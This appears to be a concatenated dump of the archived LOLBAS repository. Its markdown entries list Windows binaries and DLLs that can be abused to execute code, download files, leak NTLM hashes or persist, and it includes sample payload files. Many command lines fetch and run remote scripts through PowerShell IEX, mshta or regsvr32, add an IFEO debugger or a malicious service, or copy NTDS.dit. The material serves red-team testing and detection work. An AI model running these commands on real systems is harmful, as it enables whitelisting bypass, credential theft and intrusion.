11,,scrobj.dll,2,60,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Infdefaultinstall_calc.sct ================================================ FILE: Archive-Old-Version/OSBinaries/Payload/Infdefaultinstall_calc.sct ================================================ ================================================ FILE: Archive-Old-Version/OSBinaries/Payload/Msbuild.csproj ================================================ ================================================ FILE: Archive-Old-Version/OSBinaries/Payload/Mshta_calc.sct ================================================ ================================================ FILE: Archive-Old-Version/OSBinaries/Payload/PCW8E57.xml ================================================ ContextMenu NotListed C:\Windows\assembly\Exec-Execute.msi ================================================ FILE: Archive-Old-Version/OSBinaries/Payload/Regsvr32_calc.sct ================================================ ================================================ FILE: Archive-Old-Version/OSBinaries/Payload/Wmic_calc.xsl ================================================ ================================================ FILE: Archive-Old-Version/OSBinaries/Payload/file.rsp ================================================ REGSVR evil.dll ================================================ FILE: Archive-Old-Version/OSBinaries/Payload/mscfgtlc.xml ================================================ ================================================ FILE: Archive-Old-Version/OSBinaries/Pcalua.exe.md ================================================ ## Pcalua.exe * Functions: Execute ``` pcalua.exe -a calc.exe Open the target .EXE using the Program Compatibility Assistant. pcalua.exe -a \\server\payload.dll Open the target .DLL file with the Program Compatibilty Assistant. pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java Open the target .CPL file with the Program Compatibility Assistant. ``` * Resources: * https://twitter.com/KyleHanslovan/status/912659279806640128 * Full path: * c:\windows\system32\pcalua.exe * Notes: Thanks to: fab - @0rbz_ Kyle Hanslovan - @KyleHanslovan ================================================ FILE: Archive-Old-Version/OSBinaries/Pcwrun.exe.md ================================================ ## Pcwrun.exe * Functions: Execute ``` Pcwrun.exe c:\temp\beacon.exe Open the target .EXE file with the Program Compatibility Wizard. ``` * Resources: * https://twitter.com/pabraeken/status/991335019833708544 * Full path: * c:\windows\system32\pcwrun.exe * Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken ================================================ FILE: Archive-Old-Version/OSBinaries/Powershell.exe.md ================================================ ## Powershell.exe * Functions: Execute, Read ADS ``` powershell -ep bypass - < c:\temp:ttt Execute the encoded PowerShell command stored in an Alternate Data Stream (ADS). ``` * Resources: * https://twitter.com/Moriarty_Meng/status/984380793383370752 * Full path: * C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe * C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe * Notes: Thanks to Moriarty - @Moriarty_Meng ================================================ FILE: Archive-Old-Version/OSBinaries/PresentationHost.exe.md ================================================ ## PresentationHost.exe * Functions: Execute ``` Presentationhost.exe C:\temp\Evil.xbap Executes the target XAML Browser Application (XBAP) file. ``` * Resources: * https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ * Full path: * c:\windows\system32\PresentationHost.exe * c:\windows\sysWOW64\PresentationHost.exe * Notes: Thanks to Casey Smith - @subtee ================================================ FILE: Archive-Old-Version/OSBinaries/Print.exe.md ================================================ ## Print.exe * Functions: Download, Copy, Add ADS ``` print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe Copy file.exe into the Alternate Data Stream (ADS) of file.txt. print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe Copy File.exe from a network share to the target c:\OutFolder\outfile.exe. ``` * Resources: * https://twitter.com/Oddvarmoe/status/985518877076541440 * https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410 * Full path: * C:\Windows\System32\print.exe * C:\Windows\SysWOW64\print.exe * Notes: Thanks to Oddvar Moe - @oddvarmoe ================================================ FILE: Archive-Old-Version/OSBinaries/Psr.exe.md ================================================ ## Psr.exe * Functions: Surveillance ``` psr.exe /start /gui 0 /output c:\users\user\out.zip Capture screenshots of the desktop and save them in the target .ZIP file. psr.exe /start /maxsc 100 /gui 0 /output c:\users\user\out.zip Capture a maximum of 100 screenshots of the desktop and save them in the target .ZIP file. psr.exe /stop Stop the Problem Step Recorder. ``` * Resources: * https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf * Full path: * C:\Windows\System32\Psr.exe * C:\Windows\SysWOW64\Psr.exe * Notes: Thanks to ================================================ FILE: Archive-Old-Version/OSBinaries/Regasm.exe.md ================================================ ## Regasm.exe * Functions: Execute ``` regasm.exe /U AllTheThingsx64.dll Loads the target .DLL file and executes the UnRegisterClass function. regasm.exe AllTheThingsx64.dll Loads the target .DLL file and executes the RegisterClass function. ``` * Resources: * https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ * Full path: * C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe * C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe * Notes: Thanks to Casey Smith - @subtee ================================================ FILE: Archive-Old-Version/OSBinaries/Register-cimprovider.exe.md ================================================ ## Register-cimprovider.exe * Functions: Execute ``` Register-cimprovider -path "C:\folder\evil.dll" Load the target .DLL. ``` * Resources: * https://twitter.com/PhilipTsukerman/status/992021361106268161 * Full path: * c:\windows\system32\Register-cimprovider.exe * c:\windows\sysWOW64\Register-cimprovider.exe * Notes: Thanks to PhilipTsukerman - @PhilipTsukerman ================================================ FILE: Archive-Old-Version/OSBinaries/Regsvcs.exe.md ================================================ ## Regsvcs.exe * Functions: Execute ``` regsvcs.exe AllTheThingsx64.dll Loads the target .DLL file and executes the RegisterClass function. ``` * Resources: * https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ * Full path: * C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe * C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe * Notes: Thanks to Casey Smith - @subtee ================================================ FILE: Archive-Old-Version/OSBinaries/Regsvr32.exe.md ================================================ ## Regsvr32.exe * Functions: Execute ``` regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll Execute the specified remote .SCT script with scrobj.dll. Execute the specified local .SCT script with scrobj.dll. ``` * Resources: * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Regsvr32.md * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ * https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ * Full path: * C:\Windows\System32\regsvr32.exe * C:\Windows\SysWOW64\regsvr32.exe * Notes: Thanks to Casey Smith - @subtee ================================================ FILE: Archive-Old-Version/OSBinaries/Replace.exe.md ================================================ ## Replace.exe * Functions: Copy, Download ``` replace.exe C:\Source\File.cab C:\Destination /A Copy the specified file to the destination folder. replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A Copy the specified file to the destination folder. ``` * Resources: * https://twitter.com/elceef/status/986334113941655553 * https://twitter.com/elceef/status/986842299861782529 * Full path: * C:\Windows\System32\replace.exe * C:\Windows\SysWOW64\replace.exe * Notes: Thanks to elceef - @elceef ================================================ FILE: Archive-Old-Version/OSBinaries/Robocopy.exe.md ================================================ ## Robocopy.exe * Functions: Copy ``` Robocopy.exe C:\SourceFolder C:\DestFolder Copy the entire contents of the SourceFolder to the DestFolder. Robocopy.exe \\SERVER\SourceFolder C:\DestFolder Copy the entire contents of the SourceFolder to the DestFolder. ``` * Resources: * https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx * Full path: * c:\windows\system32\binary.exe * c:\windows\sysWOW64\binary.exe * Notes: Thanks to Name of guy - @twitterhandle ================================================ FILE: Archive-Old-Version/OSBinaries/Rpcping.exe.md ================================================ ## Rpcping.exe * Functions: Credentials ``` rpcping -s 127.0.0.1 -t ncacn_np Send a RPC test connection to the target server (-s) sending the password hash in the process. rpcping -s 192.168.1.10 -ncacn_np Send a RPC test connection to the target server (-s) sending the password hash in the process. rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process. ``` * Resources: * https://twitter.com/subtee/status/872797890539913216 * https://github.com/vysec/RedTips * https://twitter.com/vysecurity/status/974806438316072960 * https://twitter.com/vysecurity/status/873181705024266241 * Full path: * C:\Windows\System32\rpcping.exe * C:\Windows\SysWOW64\rpcping.exe * Notes: Thanks to Casey Smith - @subtee, Vincent Yiu - @vysecurity ================================================ FILE: Archive-Old-Version/OSBinaries/Rundll32.exe.md ================================================ ## Rundll32.exe * Functions: Execute, Read ADS ``` rundll32.exe AllTheThingsx64,EntryPoint Example command. AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute. rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');" Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site. rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); Use Rundll32.exe to execute a JavaScript script that runs calc.exe. rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS). ``` * Resources: * https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/ * https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7 * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Rundll32.md * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ * Full path: * C:\Windows\System32\rundll32.exe * C:\Windows\SysWOW64\rundll32.exe * Notes: Thanks to Casey Smith - @subtee ================================================ FILE: Archive-Old-Version/OSBinaries/Runonce.exe.md ================================================ ## Runonce.exe * Functions: Execute ``` Runonce.exe /AlternateShellStartup Executes a Run Once Task that has been configured in the registry. ``` * Resources: * https://twitter.com/pabraeken/status/990717080805789697 * https://cmatskas.com/configure-a-runonce-task-on-windows/ * Full path: * c:\windows\system32\runonce.exe * c:\windows\sysWOW64\runonce.exe * Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken Requires Administrative access. ================================================ FILE: Archive-Old-Version/OSBinaries/Runscripthelper.exe.md ================================================ ## Runscripthelper.exe * Functions: Execute ``` runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test Execute the PowerShell script named test.txt. ``` * Resources: * https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc * Full path: * C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe * C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe * Notes: Thanks to Matt Graeber - @mattifestation ================================================ FILE: Archive-Old-Version/OSBinaries/SC.exe.md ================================================ ## SC.exe * Functions: Execute, Read ADS, Create Service, Start Service ``` sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto sc start evilservice ``` * Resources: * https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ * Full path: * C:\Windows\System32\sc.exe * C:\Windows\SysWOW64\sc.exe * Notes: Thanks to Oddvar Moe - @oddvarmoe ================================================ FILE: Archive-Old-Version/OSBinaries/Scriptrunner.exe.md ================================================ ## Scriptrunner.exe * Functions: Execute ``` Scriptrunner.exe -appvscript calc.exe Execute calc.exe. ScriptRunner.exe -appvscript "\\fileserver\calc.cmd" Execute the calc.cmd script on the remote share. ``` * Resources: * https://twitter.com/KyleHanslovan/status/914800377580503040 * https://twitter.com/NickTyrer/status/914234924655312896 * https://github.com/MoooKitty/Code-Execution * Full path: * c:\windows\system32\scriptrunner.exe * c:\windows\sysWOW64\scriptrunner.exe * Notes: Thanks to Nick Tyrer - @NickTyrer ================================================ FILE: Archive-Old-Version/OSBinaries/SyncAppvPublishingServer.exe.md ================================================ ## SyncAppvPublishingServer.exe * Functions: Execute ``` SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX" Example command on how inject Powershell code into the process ``` * Resources: * https://twitter.com/monoxgas/status/895045566090010624 * Full path: * C:\Windows\System32\SyncAppvPublishingServer.exe * Notes: Thanks to Nick Landers - @monoxgas ================================================ FILE: Archive-Old-Version/OSBinaries/WMIC.exe.md ================================================ ## WMIC.exe * Functions: Reconnaissance, Execute, Read ADS ``` wmic.exe process call create calc Execute calc.exe. wmic.exe process call create "c:\ads\file.txt:program.exe" Execute a .EXE file stored as an Alternate Data Stream (ADS). wmic.exe useraccount get /ALL List the user accounts on the machine. wmic.exe process get caption,executablepath,commandline Gets the command line used to execute a running program. wmic.exe qfe get description,installedOn /format:csv Gets a list of installed Windows updates. wmic.exe /node:"192.168.0.1" service where (caption like "%sql server (%") Check to see if the target system is running SQL. get-wmiobject –class "win32_share" –namespace "root\CIMV2" –computer "targetname" Use the PowerShell cmdlet to list the shares on a remote server. wmic.exe /user: /password: /node: process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well. wmic.exe /node:"192.168.0.1" process call create "evil.exe" Execute evil.exe on the remote system. wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt" Create a scheduled execution of C:\GoogleUpdate.exe to run at 9pm. wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit" Create a volume shadow copy of NTDS.dit that can be copied. wmic.exe process get brief /format:"https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" Execute a script contained in the target .XSL file hosted on a remote server. wmic.exe os get /format:"MYXSLFILE.xsl" Executes JScript or VBScript embedded in the target XSL stylesheet. wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" Executes JScript or VBScript embedded in the target remote XSL stylsheet. ``` * Resources: * https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory * https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html * https://twitter.com/subTee/status/986234811944648707 * Full path: * c:\windows\system32\wbem\wmic.exe * c:\windows\sysWOW64\wbem\wmic.exe * Notes: Thanks to Casey Smith - @subtee ================================================ FILE: Archive-Old-Version/OSBinaries/Wab.exe.md ================================================ ## Wab.exe * Functions: Execute ``` Wab.exe Loads a DLL configured in the registry under HKLM. ``` * Resources: * http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/ * https://twitter.com/Hexacorn/status/991447379864932352 * Full path: * C:\Program Files\Windows Mail\wab.exe * C:\Program Files (x86)\Windows Mail\wab.exe * Notes: Thanks to Adam - @Hexacorn Requires registry changes, Requires Administrative Access ================================================ FILE: Archive-Old-Version/OSBinaries/Wscript.exe.md ================================================ ## Wscript.exe * Functions: Execute, Read ADS ``` wscript c:\ads\file.txt:script.vbs Executes the .VBS script stored as an Alternate Data Stream (ADS). ``` * Resources: * ? * Full path: * c:\windows\system32\wscript.exe * c:\windows\sysWOW64\wscript.exe * Notes: Thanks to ? ================================================ FILE: Archive-Old-Version/OSBinaries/Xwizard.exe.md ================================================ ## Xwizard.exe * Functions: DLL hijack, Execute ``` xwizard.exe Xwizard.exe will load a .DLL file located in the same directory (DLL Hijack) named xwizards.dll. xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC} Xwizard.exe running a custom class that has been added to the registry. ``` * Resources: * http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/ * https://www.youtube.com/watch?v=LwDHX7DVHWU * https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5 * Full path: * c:\windows\system32\xwizard.exe * c:\windows\sysWOW32\xwizard.exe * Notes: Thanks to Adam - @Hexacorn, Nick Tyrer - @nicktyrer ================================================ FILE: Archive-Old-Version/OSBinaries/hh.exe.md ================================================ ## hh.exe * Functions: Download, Execute ``` HH.exe http://www.google.com Opens google's web page with HTML Help. HH.exe C:\ Opens c:\\ with HTML Help. HH.exe c:\windows\system32\calc.exe Opens calc.exe with HTML Help. HH.exe http://some.url/script.ps1 Open the target PowerShell script with HTML Help. ``` * Resources: * https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/ * Full path: * c:\windows\system32\hh.exe * c:\windows\sysWOW64\hh.exe * Notes: Thanks to Oddvar Moe - @oddvarmoe ================================================ FILE: Archive-Old-Version/OSBinaries/mshta.exe.md ================================================ ## mshta.exe * Functions: Execute, Read ADS ``` mshta.exe evilfile.hta Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")")) Executes VBScript supplied as a command line argument. mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close(); Executes JavaScript supplied as a command line argument. mshta.exe "C:\ads\file.txt:file.hta" Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. ``` * Resources: * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Mshta.md * https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4 * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ * Full path: * C:\Windows\System32\mshta.exe * C:\Windows\SysWOW64\mshta.exe * Notes: Thanks to Casey Smith - @subtee, Oddvar Moe - @oddvarmoe ================================================ FILE: Archive-Old-Version/OSBinaries/odbcconf.exe.md ================================================ ## odbcconf.exe * Functions: Execute ``` odbcconf -f file.rsp Load DLL specified in target .RSP file. ``` * Resources: * https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b * https://github.com/woanware/application-restriction-bypasses * https://twitter.com/subTee/status/789459826367606784 * Full path: * c:\windows\system32\odbcconf.exe * c:\windows\sysWOW64\odbcconf.exe * Notes: Thanks to Casey Smith - @subtee, Nick Tyrer - @NickTyrer See the Playloads folder for an example .RSP file. ================================================ FILE: Archive-Old-Version/OSBinaries/reg.exe.md ================================================ ## reg.exe * Functions: Export Reg, Add ADS, Import Reg ``` reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg Export the target Registry key and save it to the specified .REG file. ``` * Resources: * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f * Full path: * c:\windows\system32\reg.exe * c:\windows\sysWOW64\reg.exe * Notes: Thanks to Oddvar Moe - @oddvarmoe ================================================ FILE: Archive-Old-Version/OSBinaries/regedit.exe.md ================================================ ## regedit.exe * Functions: Write ADS, Read ADS, Import registry ``` regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey Export the target Registry key to the specified .REG file. regedit C:\ads\file.txt:regfile.reg" Import the target .REG file into the Registry. ``` * Resources: * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f * Full path: * C:\Windows\System32\regedit.exe * C:\Windows\SysWOW64\regedit.exe * Notes: Thanks to Oddvar Moe - @oddvarmoe ================================================ FILE: Archive-Old-Version/OSLibraries/Advpack.dll.md ================================================ ## Advpack.dll * Functions: Execute ``` rundll32.exe advpack.dll,LaunchINFSection c:\\test.inf,DefaultInstall_SingleUser,1, Remote fetch and execute a COM Scriptlet by calling an information file directive (Section name specified). rundll32.exe advpack.dll,LaunchINFSection test.inf,,1, Remote fetch and execute a COM Scriptlet by calling an information file directive (DefaultInstall section implied). rundll32.exe Advpack.dll,RegisterOCX calc.exe Launch executable by calling the RegisterOCX function. rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe" Launch executable by calling the RegisterOCX function. rundll32.exe Advpack.dll,RegisterOCX test.dll Launch a DLL payload by calling the RegisterOCX function. ``` * Resources: * https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/ * https://twitter.com/ItsReallyNick/status/967859147977850880 * https://twitter.com/bohops/status/974497123101179904 * https://twitter.com/moriarty_meng/status/977848311603380224 * Full path: * c:\windows\system32\advpack.dll * c:\windows\sysWOW64\advpack.dll * Notes: Thanks to Jimmy - @bohops (LaunchINFSection), fabrizio - @0rbz_ (RegisterOCX - DLL), Moriarty @moriarty_meng (RegisterOCX - Cmd) ================================================ FILE: Archive-Old-Version/OSLibraries/Ieadvpack.dll.md ================================================ ## Ieadvpack.dll * Functions: Execute ``` rundll32.exe IEAdvpack.dll,LaunchINFSection c:\\test.inf,DefaultInstall_SingleUser,1, Remote fetch and execute a COM Scriptlet by calling an information file directive (Section name specified). rundll32.exe IEAdvpack.dll,LaunchINFSection test.inf,,1, Remote fetch and execute a COM Scriptlet by calling an information file directive (DefaultInstall section implied). rundll32.exe IEAdvpack.dll,RegisterOCX calc.exe Launch executable by calling the RegisterOCX function. rundll32.exe IEAdvpack.dll,RegisterOCX test.dll Launch a DLL payload by calling the RegisterOCX function. ``` * Resources: * https://twitter.com/pabraeken/status/991695411902599168 * https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ * https://twitter.com/0rbz_/status/974472392012689408 * Full path: * c:\windows\system32\ieadvpack.dll * c:\windows\sysWOW64\ieadvpack.dll * Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (RegisterOCX - Cmd), Jimmy - @bohops (LaunchINFSection), fabrizio - @0rbz_ (RegisterOCX - DLL) ================================================ FILE: Archive-Old-Version/OSLibraries/Ieframe.dll.md ================================================ ## Ieframe.dll * Functions: Execute ``` rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url" Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. rundll32.exe ieframe.dll,OpenURL c:\\test\\calc-url-file.zz Renamed URL file. ``` * Resources: * http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ * https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ * https://twitter.com/bohops/status/997690405092290561 * Full path: * c:\windows\system32\Ieframe.dll * c:\windows\sysWOW64\Ieframe.dll * Notes: Thanks to Adam - @hexacorn, Jimmy - @bohops ================================================ FILE: Archive-Old-Version/OSLibraries/Mshtml.dll.md ================================================ ## Mshtml.dll * Functions: Execute ``` rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta" Invoke an HTML Application. Note - Pops a security warning and a print dialogue box. ``` * Resources: * https://twitter.com/pabraeken/status/998567549670477824 * Full path: * c:\windows\system32\Mshtml.dll * c:\windows\sysWOW64\Mshtml.dll * Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken ================================================ FILE: Archive-Old-Version/OSLibraries/Payload/Advpack.inf ================================================ [version] Signature=$chicago$ AdvancedINF=2.5 [DefaultInstall_SingleUser] UnRegisterOCXs=UnRegisterOCXSection [UnRegisterOCXSection] %11%\scrobj.dll,NI,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSLibraries/Payload/Advpack_calc.sct [Strings] AppAct = "SOFTWARE\Microsoft\Connection Manager" ServiceName="Yay" ShortSvcName="Yay" ================================================ FILE: Archive-Old-Version/OSLibraries/Payload/Advpack_calc.sct ================================================ ================================================ FILE: Archive-Old-Version/OSLibraries/Payload/Ieadvpack.inf ================================================ [version] Signature=$chicago$ AdvancedINF=2.5 [DefaultInstall_SingleUser] UnRegisterOCXs=UnRegisterOCXSection [UnRegisterOCXSection] %11%\scrobj.dll,NI,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSLibraries/Payload/Advpack_calc.sct [Strings] AppAct = "SOFTWARE\Microsoft\Connection Manager" ServiceName="Yay" ShortSvcName="Yay" ================================================ FILE: Archive-Old-Version/OSLibraries/Payload/Ieadvpack_calc.sct ================================================ ================================================ FILE: Archive-Old-Version/OSLibraries/Pcwutl.dll.md ================================================ ## Pcwutl.dll * Functions: Execute ``` rundll32.exe pcwutl.dll,LaunchApplication calc.exe Launch executable by calling the LaunchApplication function. ``` * Resources: * https://twitter.com/harr0ey/status/989617817849876488 * Full path: * c:\windows\system32\Pcwutl.dll * c:\windows\sysWOW64\Pcwutl.dll * Notes: Thanks to Matt harr0ey - @harr0ey ================================================ FILE: Archive-Old-Version/OSLibraries/Setupapi.dll.md ================================================ ## Setupapi.dll * Functions: Execute ``` rundll32 setupapi,InstallHinfSection DefaultInstall 132 c:\temp\calc.inf Launch an executable file via the InstallHinfSection function and .inf file section directive. rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\shady.inf Remote fetch and execute a COM Scriptlet by calling an information file directive. ``` * Resources: * https://twitter.com/pabraeken/status/994742106852941825 * https://twitter.com/subTee/status/951115319040356352 * https://twitter.com/KyleHanslovan/status/911997635455852544 * https://github.com/huntresslabs/evading-autoruns * Full path: * c:\windows\system32\Setupapi.dll * c:\windows\sysWOW64\Setupapi.dll * Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Executable), Kyle Hanslovan - @KyleHanslovan (COM Scriptlet), Huntress Labs - @HuntressLabs (COM Scriptlet), Casey Smith - @subTee (COM Scriptlet) ================================================ FILE: Archive-Old-Version/OSLibraries/Shdocvw.dll.md ================================================ ## Shdocvw.dll * Functions: Execute ``` rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url" Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.zz" Renamed URL file. ``` * Resources: * http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ * https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ * https://twitter.com/bohops/status/997690405092290561 * Full path: * c:\windows\system32\Shdocvw.dll * c:\windows\sysWOW64\Shdocvw.dll * Notes: Thanks to Adam - @hexacorn, Jimmy - @bohops ================================================ FILE: Archive-Old-Version/OSLibraries/Shell32.dll.md ================================================ ## Shell32.dll * Functions: Execute ``` rundll32.exe shell32.dll,Control_RunDLL payload.dll Launch DLL payload. rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe Launch executable payload. rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi" Launch executable payload with arguments. ``` * Resources: * https://twitter.com/Hexacorn/status/885258886428725250 * https://twitter.com/pabraeken/status/991768766898941953 * https://twitter.com/mattifestation/status/776574940128485376 * https://twitter.com/KyleHanslovan/status/905189665120149506 * Full path: * c:\windows\system32\shell32.dll * c:\windows\sysWOW64\shell32.dll * Notes: Thanks to Adam - @hexacorn (Control_RunDLL), Pierre-Alexandre Braeken - @pabraeken (ShellExec_RunDLL), Matt Graeber - @mattifestation (ShellExec_RunDLL), Kyle Hanslovan - @KyleHanslovan (ShellExec_RunDLL) ================================================ FILE: Archive-Old-Version/OSLibraries/Syssetup.dll.md ================================================ ## Syssetup.dll * Functions: Execute ``` rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\calc.INF Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive. rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\\test\\shady.inf Remote fetch and execute a COM Scriptlet by calling an information file directive. ``` * Resources: * https://twitter.com/pabraeken/status/994392481927258113 * 